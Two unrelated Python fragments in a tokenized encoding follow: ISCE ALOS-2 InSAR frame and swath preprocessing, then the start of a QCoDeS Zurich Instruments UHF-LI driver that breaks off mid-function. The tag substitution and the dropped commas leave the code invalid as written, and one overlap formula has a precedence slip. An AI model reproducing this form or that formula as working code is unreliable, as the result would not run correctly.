self._insar.numberRangeLooksSim=self.numberRangeLooksSim<line_sep>self._insar.numberAzimuthLooksSim=self.numberAzimuthLooksSim<line_sep>self._insar.numberRangeLooksIon=self.numberRangeLooksIon<line_sep>self._insar.numberAzimuthLooksIon=self.numberAzimuthLooksIon<if_stmt>self._insar.numberRangeLooks1<is><none><block_start>self._insar.numberRangeLooks1=modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooks1']<block_end><if_stmt>self._insar.numberAzimuthLooks1<is><none><block_start>self._insar.numberAzimuthLooks1=modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooks1']<block_end><if_stmt>self._insar.numberRangeLooks2<is><none><block_start>self._insar.numberRangeLooks2=modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooks2']<block_end><if_stmt>self._insar.numberAzimuthLooks2<is><none><block_start>self._insar.numberAzimuthLooks2=modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooks2']<block_end><if_stmt>self._insar.numberRangeLooksIon<is><none><block_start>self._insar.numberRangeLooksIon=modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooksIon']<block_end><if_stmt>self._insar.numberAzimuthLooksIon<is><none><block_start>self._insar.numberAzimuthLooksIon=modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooksIon']<block_end>#define processing file names self._insar.referenceDate=os.path.basename(ledFilesReference[0]).split('-')[2]<line_sep>self._insar.secondaryDate=os.path.basename(ledFilesSecondary[0]).split('-')[2]<line_sep>self._insar.setFilename(referenceDate=self._insar.referenceDate secondaryDate=self._insar.secondaryDate nrlks1=self._insar.numberRangeLooks1 nalks1=self._insar.numberAzimuthLooks1 nrlks2=self._insar.numberRangeLooks2 nalks2=self._insar.numberAzimuthLooks2)<line_sep>#find frame numbers <if_stmt>(self._insar.modeCombination<eq>31)<or>(self._insar.modeCombination<eq>32)<block_start><if_stmt>(self.referenceFrames<eq><none>)<or>(self.secondaryFrames<eq><none>)<block_start><raise>Exception('for ScanSAR-stripmap 
inteferometry, you must set reference and secondary frame numbers')<block_end><block_end>#if not set, find frames automatically <if_stmt>self.referenceFrames<eq><none><block_start>self.referenceFrames=[]<for_stmt>led ledFilesReference<block_start>frameNumber=os.path.basename(led).split('-')[1][-4:]<if_stmt>frameNumber<not><in>self.referenceFrames<block_start>self.referenceFrames.append(frameNumber)<block_end><block_end><block_end><if_stmt>self.secondaryFrames<eq><none><block_start>self.secondaryFrames=[]<for_stmt>led ledFilesSecondary<block_start>frameNumber=os.path.basename(led).split('-')[1][-4:]<if_stmt>frameNumber<not><in>self.secondaryFrames<block_start>self.secondaryFrames.append(frameNumber)<block_end><block_end><block_end>#sort frames self.referenceFrames=sorted(self.referenceFrames)<line_sep>self.secondaryFrames=sorted(self.secondaryFrames)<line_sep>#check number of frames <if_stmt>len(self.referenceFrames)<ne>len(self.secondaryFrames)<block_start><raise>Exception('number of frames in reference dir is not equal to number of frames \ in secondary dir. 
please set frame number manually')<block_end>#find swath numbers (if not ScanSAR-ScanSAR, compute valid swaths) <if_stmt>(self._insar.modeCombination<eq>0)<or>(self._insar.modeCombination<eq>1)<block_start>self.startingSwath=1<line_sep>self.endingSwath=1<block_end><if_stmt>self._insar.modeCombination<eq>21<block_start><if_stmt>self.startingSwath<eq><none><block_start>self.startingSwath=1<block_end><if_stmt>self.endingSwath<eq><none><block_start>self.endingSwath=5<block_end><block_end><if_stmt>self._insar.modeCombination<eq>22<block_start><if_stmt>self.startingSwath<eq><none><block_start>self.startingSwath=1<block_end><if_stmt>self.endingSwath<eq><none><block_start>self.endingSwath=7<block_end><block_end>#determine starting and ending swaths for ScanSAR-stripmap, user's settings are overwritten #use first frame to check overlap <if_stmt>(self._insar.modeCombination<eq>31)<or>(self._insar.modeCombination<eq>32)<block_start><if_stmt>self._insar.modeCombination<eq>31<block_start>numberOfSwaths=5<block_end><else_stmt><block_start>numberOfSwaths=7<block_end>overlapSubswaths=[]<for_stmt>i range(numberOfSwaths)<block_start>overlapRatio=check_overlap(ledFilesReference[0] firstFrameImagesReference[i] ledFilesSecondary[0] firstFrameImagesSecondary[0])<if_stmt>overlapRatio<g>1.0/4.0<block_start>overlapSubswaths.append(i+1)<block_end><block_end><if_stmt>overlapSubswaths<eq>[]<block_start><raise>Exception('There is no overlap area between the ScanSAR-stripmap pair')<block_end>self.startingSwath=int(overlapSubswaths[0])<line_sep>self.endingSwath=int(overlapSubswaths[-1])<block_end>#save the valid frames and swaths for future processing self._insar.referenceFrames=self.referenceFrames<line_sep>self._insar.secondaryFrames=self.secondaryFrames<line_sep>self._insar.startingSwath=self.startingSwath<line_sep>self._insar.endingSwath=self.endingSwath<line_sep>################################################## #1. 
create directories and read data ################################################## self.reference.configure()<line_sep>self.secondary.configure()<line_sep>self.reference.track.configure()<line_sep>self.secondary.track.configure()<for_stmt>i,(referenceFrame secondaryFrame) enumerate(zip(self._insar.referenceFrames self._insar.secondaryFrames))#frame number starts with 1 <block_start>frameDir='f{}_{}'.format(i+1 referenceFrame)<line_sep>os.makedirs(frameDir exist_ok=<true>)<line_sep>os.chdir(frameDir)<line_sep>#attach a frame to reference and secondary frameObjReference=MultiMode.createFrame()<line_sep>frameObjSecondary=MultiMode.createFrame()<line_sep>frameObjReference.configure()<line_sep>frameObjSecondary.configure()<line_sep>self.reference.track.frames.append(frameObjReference)<line_sep>self.secondary.track.frames.append(frameObjSecondary)<line_sep>#swath number starts with 1 <for_stmt>j range(self._insar.startingSwath self._insar.endingSwath+1)<block_start>print('processing frame {} swath {}'.format(referenceFrame j))<line_sep>swathDir='s{}'.format(j)<line_sep>os.makedirs(swathDir exist_ok=<true>)<line_sep>os.chdir(swathDir)<line_sep>#attach a swath to reference and secondary swathObjReference=MultiMode.createSwath()<line_sep>swathObjSecondary=MultiMode.createSwath()<line_sep>swathObjReference.configure()<line_sep>swathObjSecondary.configure()<line_sep>self.reference.track.frames[-1].swaths.append(swathObjReference)<line_sep>self.secondary.track.frames[-1].swaths.append(swathObjSecondary)<line_sep>#setup reference self.reference.leaderFile=sorted(glob.glob(os.path.join(self.referenceDir 'LED-ALOS2*{}-*-*'.format(referenceFrame))))[0]<if_stmt>referenceMode<in>scansarModes<block_start>self.reference.imageFile=sorted(glob.glob(os.path.join(self.referenceDir 'IMG-{}-ALOS2*{}-*-*-F{}'.format(self.referencePolarization.upper() referenceFrame j))))[0]<block_end><else_stmt><block_start>self.reference.imageFile=sorted(glob.glob(os.path.join(self.referenceDir 
'IMG-{}-ALOS2*{}-*-*'.format(self.referencePolarization.upper() referenceFrame))))[0]<block_end>self.reference.outputFile=self._insar.referenceSlc<line_sep>self.reference.useVirtualFile=self.useVirtualFile<line_sep>#read reference (imageFDR imageData)=self.reference.readImage()<line_sep>(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord)=self.reference.readLeader()<line_sep>self.reference.setSwath(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>self.reference.setFrame(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>self.reference.setTrack(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>#setup secondary self.secondary.leaderFile=sorted(glob.glob(os.path.join(self.secondaryDir 'LED-ALOS2*{}-*-*'.format(secondaryFrame))))[0]<if_stmt>secondaryMode<in>scansarModes<block_start>self.secondary.imageFile=sorted(glob.glob(os.path.join(self.secondaryDir 'IMG-{}-ALOS2*{}-*-*-F{}'.format(self.secondaryPolarization.upper() secondaryFrame j))))[0]<block_end><else_stmt><block_start>self.secondary.imageFile=sorted(glob.glob(os.path.join(self.secondaryDir 'IMG-{}-ALOS2*{}-*-*'.format(self.secondaryPolarization.upper() secondaryFrame))))[0]<block_end>self.secondary.outputFile=self._insar.secondarySlc<line_sep>self.secondary.useVirtualFile=self.useVirtualFile<line_sep>#read secondary (imageFDR imageData)=self.secondary.readImage()<line_sep>(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord)=self.secondary.readLeader()<line_sep>self.secondary.setSwath(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>self.secondary.setFrame(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>self.secondary.setTrack(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR 
imageData)<line_sep>os.chdir('../')<block_end>self._insar.saveProduct(self.reference.track.frames[-1] self._insar.referenceFrameParameter)<line_sep>self._insar.saveProduct(self.secondary.track.frames[-1] self._insar.secondaryFrameParameter)<line_sep>os.chdir('../')<block_end>self._insar.saveProduct(self.reference.track self._insar.referenceTrackParameter)<line_sep>self._insar.saveProduct(self.secondary.track self._insar.secondaryTrackParameter)<line_sep>catalog.printToLog(logger "runPreprocessor")<line_sep>self._insar.procDoc.addAllFromCatalog(catalog)<block_end><def_stmt>check_overlap ldr_m img_m ldr_s img_s<block_start><import_from_stmt>isceobj.Constants SPEED_OF_LIGHT<line_sep>rangeSamplingRateReference,widthReference,nearRangeReference=read_param_for_checking_overlap(ldr_m img_m)<line_sep>rangeSamplingRateSecondary,widthSecondary,nearRangeSecondary=read_param_for_checking_overlap(ldr_s img_s)<line_sep>farRangeReference=nearRangeReference+(widthReference-1)<times>0.5<times>SPEED_OF_LIGHT/rangeSamplingRateReference<line_sep>farRangeSecondary=nearRangeSecondary+(widthSecondary-1)<times>0.5<times>SPEED_OF_LIGHT/rangeSamplingRateSecondary<line_sep>#This should be good enough, although precise image offsets are not used. 
<if_stmt>farRangeReference<le>nearRangeSecondary<block_start>overlapRatio=0.0<block_end><elif_stmt>farRangeSecondary<le>nearRangeReference<block_start>overlapRatio=0.0<block_end><else_stmt># 0 1 2 3 <block_start>ranges=np.array([nearRangeReference farRangeReference nearRangeSecondary farRangeSecondary])<line_sep>rangesIndex=np.argsort(ranges)<line_sep>overlapRatio=ranges[rangesIndex[2]]-ranges[rangesIndex[1]]/(farRangeReference-nearRangeReference)<block_end><return>overlapRatio<block_end><def_stmt>read_param_for_checking_overlap leader_file image_file<block_start><import_from_stmt>isceobj.Sensor xmlPrefix<import_stmt>isceobj.Sensor.CEOS<as>CEOS<line_sep>#read from leader file fsampConst={104:1.047915957140240E+08 52:5.239579785701190E+07 34:3.493053190467460E+07 17:1.746526595233730E+07}<line_sep>fp=open(leader_file 'rb')<line_sep>leaderFDR=CEOS.CEOSDB(xml=os.path.join(xmlPrefix 'alos2_slc/leader_file.xml') dataFile=fp)<line_sep>leaderFDR.parse()<line_sep>fp.seek(leaderFDR.getEndOfRecordPosition())<line_sep>sceneHeaderRecord=CEOS.CEOSDB(xml=os.path.join(xmlPrefix 'alos2_slc/scene_record.xml') dataFile=fp)<line_sep>sceneHeaderRecord.parse()<line_sep>fp.seek(sceneHeaderRecord.getEndOfRecordPosition())<line_sep>fsamplookup=int(sceneHeaderRecord.metadata['Range sampling rate in MHz'])<line_sep>rangeSamplingRate=fsampConst[fsamplookup]<line_sep>fp.close()<line_sep>#print('{}'.format(rangeSamplingRate)) #read from image file fp=open(image_file 'rb')<line_sep>imageFDR=CEOS.CEOSDB(xml=os.path.join(xmlPrefix 'alos2_slc/image_file.xml') dataFile=fp)<line_sep>imageFDR.parse()<line_sep>fp.seek(imageFDR.getEndOfRecordPosition())<line_sep>imageData=CEOS.CEOSDB(xml=os.path.join(xmlPrefix 'alos2_slc/image_record.xml') dataFile=fp)<line_sep>imageData.parseFast()<line_sep>width=imageFDR.metadata['Number of pixels per line per SAR channel']<line_sep>near_range=imageData.metadata['Slant range to 1st data sample']<line_sep>fp.close()<line_sep>#print('{}'.format(width)) 
#print('{}'.format(near_range)) <return>(rangeSamplingRate width near_range)<block_end>
<import_stmt>logging<import_stmt>math<import_stmt>time<import_from_stmt>functools partial<import_from_stmt>math sqrt<import_from_stmt>typing Any Callable Dict List Optional Sequence Union cast<import_stmt>numpy<as>np<import_from_stmt>qcodes.utils.helpers create_on_off_val_mapping<try_stmt><block_start><import_stmt>zhinst.utils<block_end><except_stmt>ImportError<block_start><raise>ImportError('''Could not find Zurich Instruments Lab One software. Please refer to the Zi UHF-LI User Manual for download and installation instructions. ''')<block_end><import_from_stmt>qcodes.instrument.base Instrument<import_from_stmt>qcodes.instrument.channel ChannelList InstrumentChannel<import_from_stmt>qcodes.instrument.parameter MultiParameter<import_from_stmt>qcodes.utils validators<as>vals<import_from_stmt>qcodes.utils.deprecate deprecate<line_sep>log=logging.getLogger(__name__)<class_stmt>AUXOutputChannel(InstrumentChannel)<block_start><def_stmt>__init__ self parent:'ZIUHFLI' name:str channum:int<arrow><none><block_start>super().__init__(parent name)<line_sep># TODO better validations of parameters self.add_parameter('scale' label='scale' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'scale') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'scale') vals=vals.Numbers())<line_sep>self.add_parameter('preoffset' label='preoffset' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'preoffset') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'preoffset') vals=vals.Numbers())<line_sep>self.add_parameter('offset' label='offset' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'offset') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'offset') vals=vals.Numbers())<line_sep>self.add_parameter('limitlower' label='Lower limit' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'limitlower') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'limitlower') 
vals=vals.Numbers())<line_sep>self.add_parameter('limitupper' label='Upper limit' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'limitupper') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'limitupper') vals=vals.Numbers())<line_sep># TODO the validator does not catch that there are only # 2 valid output channels for AU types self.add_parameter('channel' label='Channel' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 0 'demodselect') set_cmd=partial(self._parent._setter 'auxouts' channum-1 0 'demodselect') get_parser=<lambda>x:x+1 set_parser=<lambda>x:x-1 vals=vals.Ints(0 7))<line_sep>outputvalmapping={'Demod X':0 'Demod Y':1 'Demod R':2 'Demod THETA':3 'AU Cartesian':7 'AU Polar':8}<line_sep>self.add_parameter('output' label='Output' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 0 'outputselect') set_cmd=partial(self._parent._setter 'auxouts' channum-1 0 'outputselect') val_mapping=outputvalmapping)<block_end><block_end><class_stmt>Sweep(MultiParameter)<block_start>""" Parameter class for the ZIUHFLI instrument class for the sweeper. The get method returns a tuple of arrays, where each array contains the values of a signal added to the sweep (e.g. demodulator 4 phase). Attributes: names (tuple): Tuple of strings containing the names of the sweep signals (to be measured) units (tuple): Tuple of strings containing the units of the signals shapes (tuple): Tuple of tuples each containing the Length of a signal. setpoints (tuple): Tuple of N copies of the sweep x-axis points, where N is the number of measured signals setpoint_names (tuple): Tuple of N identical strings with the name of the sweep x-axis. """<def_stmt>__init__ self name instrument **kwargs# The __init__ requires that we supply names and shapes, # but there is no way to know what they could be known at this time. # They are updated via build_sweep. 
<block_start>super().__init__(name names=("" ) shapes=((1 ) ) instrument=instrument **kwargs)<block_end><def_stmt>build_sweep self<block_start>""" Build a sweep with the current sweep settings. Must be called before the sweep can be executed. For developers: This is a general function for updating the sweeper. Every time a parameter of the sweeper is changed, this function must be called to update the sweeper. Although such behaviour is only strictly necessary for parameters that affect the setpoints of the Sweep parameter, having to call this function for any parameter is deemed more user friendly (easier to remember; when? -always). The function sets all (user specified) settings on the sweeper and additionally sets names, units, and setpoints for the Sweep parameter. """<line_sep>signals=self.instrument._sweeper_signals<line_sep>sweepdict=self.instrument._sweepdict<line_sep>log.info('Built a sweep')<line_sep>sigunits={'X':'V' 'Y':'V' 'R':'Vrms' 'Xrms':'Vrms' 'Yrms':'Vrms' 'Rrms':'Vrms' 'phase':'degrees'}<line_sep>names=[]<line_sep>units=[]<for_stmt>sig signals<block_start>name=sig.split('/')[-1]<line_sep>names.append(name)<line_sep>units.append(sigunits[name])<block_end>self.names=tuple(names)<line_sep>self.units=tuple(units)<line_sep>self.labels=tuple(names)# TODO: What are good labels? # TODO: what are good set point names? 
spnamedict={'auxouts/0/offset':'Volts' 'auxouts/1/offset':'Volts' 'auxouts/2/offset':'Volts' 'auxouts/3/offset':'Volts' 'demods/0/phaseshift':'degrees' 'demods/1/phaseshift':'degrees' 'demods/2/phaseshift':'degrees' 'demods/3/phaseshift':'degrees' 'demods/4/phaseshift':'degrees' 'demods/5/phaseshift':'degrees' 'demods/6/phaseshift':'degrees' 'demods/7/phaseshift':'degrees' 'oscs/0/freq':'Hz' 'oscs/1/freq':'Hz' 'sigouts/0/amplitudes/3':'Volts' 'sigouts/0/offset':'Volts' 'sigouts/1/amplitudes/7':'Volts' 'sigouts/1/offset':'Volts'}<line_sep>sp_name=spnamedict[sweepdict['gridnode']]<line_sep>self.setpoint_names=((sp_name ) )<times>len(signals)<line_sep>start=sweepdict['start']<line_sep>stop=sweepdict['stop']<line_sep>npts=sweepdict['samplecount']<line_sep># TODO: make sure that these setpoints are correct, i.e. actually # matching what the UHFLI does # TODO: support non-sequential sweep mode <if_stmt><not>sweepdict['scan']<eq>0<block_start><raise>NotImplementedError('Only sequential scanning is supported.')<block_end><if_stmt>sweepdict['xmapping']<eq>0<block_start>sw=tuple(np.linspace(start stop npts))<block_end><else_stmt><block_start>logstart=np.log10(start)<line_sep>logstop=np.log10(stop)<line_sep>sw=tuple(np.logspace(logstart logstop npts))<block_end>self.setpoints=((sw ) )<times>len(signals)<line_sep>self.shapes=((npts ) )<times>len(signals)<line_sep># Now actually send the settings to the instrument <for_stmt>(setting value) sweepdict.items()<block_start>setting='sweep/'+setting<line_sep>self.instrument.sweeper.set(setting value)<block_end>self.instrument.sweep_correctly_built=<true><block_end><def_stmt>get_raw self<block_start>""" Execute the sweeper and return the data corresponding to the subscribed signals. Returns: tuple: Tuple containing N numpy arrays where N is the number of signals added to the sweep. 
Raises: ValueError: If no signals have been added to the sweep ValueError: If a sweep setting has been modified since the last sweep, but Sweep.build_sweep has not been run """<line_sep>daq=self.instrument.daq<line_sep>signals=self.instrument._sweeper_signals<line_sep>sweeper=self.instrument.sweeper<if_stmt>signals<eq>[]<block_start><raise>ValueError('No signals selected! Can not perform sweep.')<block_end><if_stmt>self.instrument.sweep_correctly_built<is><false><block_start><raise>ValueError('The sweep has not been correctly built.'+' Please run Sweep.build_sweep.')<block_end># We must enable the demodulators we use. # After the sweep, they should be returned to their original state streamsettings=[]# This list keeps track of the pre-sweep settings <for_stmt>sigstr signals<block_start>path='/'.join(sigstr.split('/')[:-1])<line_sep>(_ dev _ dmnum _)=path.split('/')<line_sep># If the setting has never changed, get returns an empty dict. # In that case, we assume that it's zero (factory default) <try_stmt><block_start>toget=path.replace('sample' 'enable')<line_sep># ZI like nesting inside dicts... setting=daq.get(toget)[dev]['demods'][dmnum]['enable']['value'][0]<block_end><except_stmt>KeyError<block_start>setting=0<block_end>streamsettings.append(setting)<line_sep>daq.setInt(path.replace('sample' 'enable') 1)<line_sep># We potentially subscribe several times to the same demodulator, # but that should not be a problem sweeper.subscribe(path)<block_end>sweeper.execute()<line_sep>timeout=self.instrument.sweeper_timeout.get()<line_sep>start=time.time()<while_stmt><not>sweeper.finished()# Wait until the sweep is done/timeout <block_start>time.sleep(0.2)# Check every 200 ms whether the sweep is done # Here we could read intermediate data via: # data = sweeper.read(True)... # and process it while the sweep is completing. <if_stmt>(time.time()-start)<g>timeout# If for some reason the sweep is blocking, force the end of the # measurement. 
<block_start>log.error("Sweep still not finished, forcing finish...")<line_sep># should exit function with error message instead of returning sweeper.finish()<block_end><block_end>return_flat_dict=<true><line_sep>data=sweeper.read(return_flat_dict)<line_sep>sweeper.unsubscribe('*')<for_stmt>(state sigstr) zip(streamsettings signals)<block_start>path='/'.join(sigstr.split('/')[:-1])<line_sep>daq.setInt(path.replace('sample' 'enable') int(state))<block_end><return>self._parsesweepdata(data)<block_end><def_stmt>_parsesweepdata self sweepresult<block_start>""" Parse the raw result of a sweep into just the data asked for by the added sweeper signals. Used by Sweep.get. Args: sweepresult (dict): The dict returned by sweeper.read Returns: tuple: The requested signals in a tuple """<line_sep>trans={'X':'x' 'Y':'y' 'Aux Input 1':'auxin0' 'Aux Input 2':'auxin1' 'R':'r' 'phase':'phase' 'Xrms':'xpwr' 'Yrms':'ypwr' 'Rrms':'rpwr'}<line_sep>returndata=[]<for_stmt>signal self.instrument._sweeper_signals<block_start>path='/'.join(signal.split('/')[:-1])<line_sep>attr=signal.split('/')[-1]<line_sep>data=sweepresult[path][0][0][trans[attr]]<line_sep>returndata.append(data)<block_end><return>tuple(returndata)<block_end><block_end><class_stmt>Scope(MultiParameter)<block_start>""" Parameter class for the ZI UHF-LI Scope Channel 1 The .get method launches an acquisition and returns a tuple of two np.arrays FFT mode is NOT supported. Attributes: names (tuple): Tuple of strings containing the names of the sweep signals (to be measured) units (tuple): Tuple of strings containing the units of the signals shapes (tuple): Tuple of tuples each containing the Length of a signal. setpoints (tuple): Tuple of N copies of the sweep x-axis points, where N is the number of measured signals setpoint_names (tuple): Tuple of N identical strings with the name of the sweep x-axis. 
"""<def_stmt>__init__ self name instrument **kwargs# The __init__ requires that we supply names and shapes, # but there is no way to know what they could be known at this time. # They are updated via build_scope. <block_start>super().__init__(name names=("" ) shapes=((1 ) ) instrument=instrument **kwargs)<line_sep>self._scopeactions=[]<block_end># list of callables <def_stmt>add_post_trigger_action self action:Callable[<ellipsis> Any]<arrow><none><block_start>""" Add an action to be performed immediately after the trigger has been armed. The action must be a callable taking zero arguments """<if_stmt>action<not><in>self._scopeactions<block_start>self._scopeactions.append(action)<block_end><block_end>@property<def_stmt>post_trigger_actions self<arrow>List[Callable[<ellipsis> Any]]<block_start><return>self._scopeactions<block_end><def_stmt>prepare_scope self<block_start>""" Prepare the scope for a measurement. Must immediately preceed a measurement. """<line_sep>log.info('Preparing the scope')<line_sep># A convenient reference params=self.instrument.parameters<line_sep># First figure out what the user has asked for chans={1:(<true> <false>) 2:(<false> <true>) 3:(<true> <true>)}<line_sep>channels=chans[params['scope_channels'].get()]<line_sep>npts=params['scope_length'].get()<line_sep># Find out whether segments are enabled <if_stmt>params['scope_segments'].get()<eq>'ON'<block_start>segs=params['scope_segments_count'].get()<block_end><else_stmt><block_start>segs=1<block_end>inputunits={'Signal Input 1':'V' 'Signal Input 2':'V' 'Trig Input 1':'V' 'Trig Input 2':'V' 'Aux Output 1':'V' 'Aux Output 2':'V' 'Aux Output 3':'V' 'Aux Output 4':'V' 'Aux In 1 Ch 1':'V' 'Aux In 1 Ch 2':'V' 'Osc phi Demod 4':'°' 'osc phi Demod 8':'°' 'AU Cartesian 1':'arb. un.' 'AU Cartesian 2':'arb. un' 'AU Polar 1':'arb. un.' 'AU Polar 2':'arb. un.' 
'Demod 1 X':'V' 'Demod 1 Y':'V' 'Demod 1 R':'V' 'Demod 1 Phase':'°' 'Demod 2 X':'V' 'Demod 2 Y':'V' 'Demod 2 R':'V' 'Demod 2 Phase':'°' 'Demod 3 X':'V' 'Demod 3 Y':'V' 'Demod 3 R':'V' 'Demod 3 Phase':'°' 'Demod 4 X':'V' 'Demod 4 Y':'V' 'Demod 4 R':'V' 'Demod 4 Phase':'°' 'Demod 5 X':'V' 'Demod 5 Y':'V' 'Demod 5 R':'V' 'Demod 5 Phase':'°' 'Demod 6 X':'V' 'Demod 6 Y':'V' 'Demod 6 R':'V' 'Demod 6 Phase':'°' 'Demod 7 X':'V' 'Demod 7 Y':'V' 'Demod 7 R':'V' 'Demod 7 Phase':'°' 'Demod 8 X':'V' 'Demod 8 Y':'V' 'Demod 8 R':'V' 'Demod 8 Phase':'°' }<line_sep>#TODO: what are good names? inputnames={'Signal Input 1':'Sig. In 1' 'Signal Input 2':'Sig. In 2' 'Trig Input 1':'Trig. In 1' 'Trig Input 2':'Trig. In 2' 'Aux Output 1':'Aux. Out 1' 'Aux Output 2':'Aux. Out 2' 'Aux Output 3':'Aux. Out 3' 'Aux Output 4':'Aux. Out 4' 'Aux In 1 Ch 1':'Aux. In 1 Ch 1' 'Aux In 1 Ch 2':'Aux. In 1 Ch 2' 'Osc phi Demod 4':'Demod. 4 Phase' 'osc phi Demod 8':'Demod. 8 Phase' 'AU Cartesian 1':'AU Cartesian 1' 'AU Cartesian 2':'AU Cartesian 2' 'AU Polar 1':'AU Polar 1' 'AU Polar 2':'AU Polar 2' 'Demod 1 X':'Demodulator 1 X' 'Demod 1 Y':'Demodulator 1 Y' 'Demod 1 R':'Demodulator 1 R' 'Demod 1 Phase':'Demodulator 1 Phase' 'Demod 2 X':'Demodulator 2 X' 'Demod 2 Y':'Demodulator 2 Y' 'Demod 2 R':'Demodulator 2 R' 'Demod 2 Phase':'Demodulator 2 Phase' 'Demod 3 X':'Demodulator 3 X' 'Demod 3 Y':'Demodulator 3 Y' 'Demod 3 R':'Demodulator 3 R' 'Demod 3 Phase':'Demodulator 3 Phase' 'Demod 4 X':'Demodulator 4 X' 'Demod 4 Y':'Demodulator 4 Y' 'Demod 4 R':'Demodulator 4 R' 'Demod 4 Phase':'Demodulator 4 Phase' 'Demod 5 X':'Demodulator 5 X' 'Demod 5 Y':'Demodulator 5 Y' 'Demod 5 R':'Demodulator 5 R' 'Demod 5 Phase':'Demodulator 5 Phase' 'Demod 6 X':'Demodulator 6 X' 'Demod 6 Y':'Demodulator 6 Y' 'Demod 6 R':'Demodulator 6 R' 'Demod 6 Phase':'Demodulator 6 Phase' 'Demod 7 X':'Demodulator 7 X' 'Demod 7 Y':'Demodulator 7 Y' 'Demod 7 R':'Demodulator 7 R' 'Demod 7 Phase':'Demodulator 7 Phase' 'Demod 8 X':'Demodulator 8 
X' 'Demod 8 Y':'Demodulator 8 Y' 'Demod 8 R':'Demodulator 8 R' 'Demod 8 Phase':'Demodulator 8 Phase' }<line_sep># Make the basic setpoints (the x-axis) duration=params['scope_duration'].get()<line_sep>delay=params['scope_trig_delay'].get()<line_sep>starttime=params['scope_trig_reference'].get()<times>0.01<times>duration+delay<line_sep>stoptime=starttime+duration<line_sep>setpointlist=tuple(np.linspace(starttime stoptime npts))# x-axis spname='Time'<line_sep>namestr=f"scope_channel{1}_input"<line_sep>name1=inputnames[params[namestr].get()]<line_sep>unit1=inputunits[params[namestr].get()]<line_sep>namestr=f"scope_channel{2}_input"<line_sep>name2=inputnames[params[namestr].get()]<line_sep>unit2=inputunits[params[namestr].get()]<line_sep>self.setpoints=((tuple(range(segs)) (setpointlist )<times>segs) )<times>2<line_sep>#self.setpoints = ((setpointlist,)*segs,)*2 self.setpoint_names=(('Segments' 'Time') ('Segments' 'Time'))<line_sep>self.names=(name1 name2)<line_sep>self.units=(unit1 unit2)<line_sep>self.labels=('Scope channel 1' 'Scope channel 2')<line_sep>self.shapes=((segs npts) (segs npts))<line_sep>self.instrument.daq.sync()<line_sep>self.instrument.scope_correctly_built=<true><block_end><def_stmt>get_raw self<block_start>""" Acquire data from the scope. Returns: tuple: Tuple of two n X m arrays where n is the number of segments and m is the number of points in the scope trace. Raises: ValueError: If the scope has not been prepared by running the prepare_scope function. """<line_sep>t_start=time.monotonic()<line_sep>log.info('Scope get method called')<if_stmt><not>self.instrument.scope_correctly_built<block_start><raise>ValueError('Scope not properly prepared. 
Please run '<concat>'prepare_scope before measuring.')<block_end># A convenient reference params=self.instrument.parameters<line_sep># chans={1:(<true> <false>) 2:(<false> <true>) 3:(<true> <true>)}<line_sep>channels=chans[params['scope_channels'].get()]<if_stmt>params['scope_trig_holdoffmode'].get_latest()<eq>'events'<block_start><raise>NotImplementedError('Scope trigger holdoff in number of '<concat>'events not supported. Please specify '<concat>'holdoff in seconds.')<block_end>####################################################### # The following steps SEEM to give the correct result # Make sure all settings have taken effect self.instrument.daq.sync()<line_sep># Calculate the time needed for the measurement. We often have failed # measurements, so a timeout is needed. <if_stmt>params['scope_segments'].get()<eq>'ON'<block_start>segs=params['scope_segments_count'].get()<block_end><else_stmt><block_start>segs=1<block_end>deadtime=params['scope_trig_holdoffseconds'].get_latest()<line_sep># We add one second to account for latencies and random delays meas_time=segs<times>(params['scope_duration'].get()+deadtime)+1<line_sep>npts=params['scope_length'].get()<line_sep>zi_error=<true><line_sep>error_counter=0<line_sep>num_retries=10<line_sep>timedout=<false><while_stmt>(zi_error<or>timedout)<and>error_counter<l>num_retries# one shot per trigger. This needs to be set every time # a the scope is enabled as below using scope_runstop <block_start><try_stmt># we wrap this in try finally to ensure that # scope.finish is always called even if the # measurement is interrupted <block_start>self.instrument.daq.setInt(f"/{self.instrument.device}/scopes/0/single" 1)<line_sep>scope=self.instrument.scope<line_sep>scope.set('scopeModule/clearhistory' 1)<line_sep># Start the scope triggering/acquiring # set /dev/scopes/0/enable to 1 params['scope_runstop'].set('run')<line_sep>self.instrument.daq.sync()<line_sep>log.debug('Starting ZI scope acquisition.')<line_sep># Start something... 
